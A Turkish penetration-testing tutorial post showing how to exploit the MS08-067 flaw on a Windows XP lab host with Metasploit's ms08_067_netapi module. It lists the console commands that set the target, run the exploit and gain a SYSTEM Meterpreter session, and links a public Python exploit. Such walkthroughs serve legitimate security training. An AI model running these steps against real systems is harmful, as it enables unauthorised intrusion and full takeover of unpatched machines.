MSF ms08_067_netapi İstismar Modülü ile İşletim Sistemi Zafiyetin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

0
73
views
Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda Windows XP SPO işletim sisteminde MS08-067 zafiyetinin Metasploit Framework ile istismar edilecek ve SYSTEM hakları ile Meterpreter bağlantısı elde edilecektir.

Nessus ile zafiyet taraması sonucunda 192.168.244.138 IP adresli bilgisayarda MS08-067 zafiyetinin tespit edildiği görülmektedir.

acquiring-meterpreter-shell-on-windows-by-using-msf-ms08-067-netapi-module-01

Bu zafiyeti istismar etmek için Kali sağıtımı üzerindeki Metasploit Framework kullanılabilir. Bu işlem için öncelikle Kali’deki komut satırından MSF’in komut satırına erişilir.

msfconsole -q

Metasploit üzerinde ilgili modülün (MSF ms08_067_netapi istismar modülü) seçenekleri aşağıdaki gibidir:

search ms08-067
use exploit/windows/smb/ms08_067_netapi
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-ms08-067-netapi-module-02

Seçenek olarak hedef IP adresinin ayarlanması yeterlidir. Böylece modül çalıştırılabilir.

set RHOST 192.168.244.138
show options
exploit

acquiring-meterpreter-shell-on-windows-by-using-msf-ms08-067-netapi-module-03

Modül çalıştırıldığında SYSTEM haklarıyla svchost.exe prosesine enjekte olunduğu görülmektedir.

sysinfo
getuid
getpid
ps

acquiring-meterpreter-shell-on-windows-by-using-msf-ms08-067-netapi-module-04

 

Not: MSF yerine Exploit-db içerisindeki Python kodu da kullanılabilirdi.

https://www.exploit-db.com/exploits/7132/

 

Bu açıklıkla ilgili ayrıntılı bilgi için Bilgi Güvenliği Kapısı‘nda yayınlanan bağlantıdaki yazı incelenebilir.

 

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz